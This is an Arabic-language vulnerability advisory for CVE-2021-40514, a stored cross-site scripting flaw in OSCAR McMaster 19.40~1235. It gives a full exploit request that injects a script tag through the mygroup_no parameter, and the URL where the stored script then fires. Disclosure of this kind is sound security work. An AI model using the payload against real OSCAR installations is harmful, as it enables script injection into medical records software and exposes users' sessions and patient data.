
CVE-2021-40514 OSCAR McMaster 19.40~1235 ثغرة البرمجة النصية عبر المواقع المخزنة.
توجد ثغرة تخزين البرمجة النصية عبر المواقع (Stored XSS) في عدة صفحات من الإصدار 19.40~1235 لتطبيق OSCAR McMaster، مما يسمح بتنفيذ أوامر JavaScript بشكل تعسفي.
[عنصر نائب لـ CVE mitre]
صفحات JSP المتأثرة:
providercontrol.jsp - معامل mygroupno
مثال على حمولة الاستغلال:
/oscar/provider/providercontrol.jsp?provider_no=999998&start_hour=8&end_hour=18&every_min=15&color_template=deepblue&dboperation=updatepreference&displaymode=updatepreference&default_servicetype=&prescriptionQrCodes=false&erx_enable=false&erx_training_mode=false&mygroup_no=%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3E&programId_oscarView=0
يتم تنفيذ الاستجابة المخزنة على المستخدم عبر الرابط التالي:
/oscar/provider/providercontrol.jsp?year=2021&month=8&day=1&view=0&displaymode=month&dboperation=searchappointmentmonth
اكتشفها Jack McBride، أغسطس 2021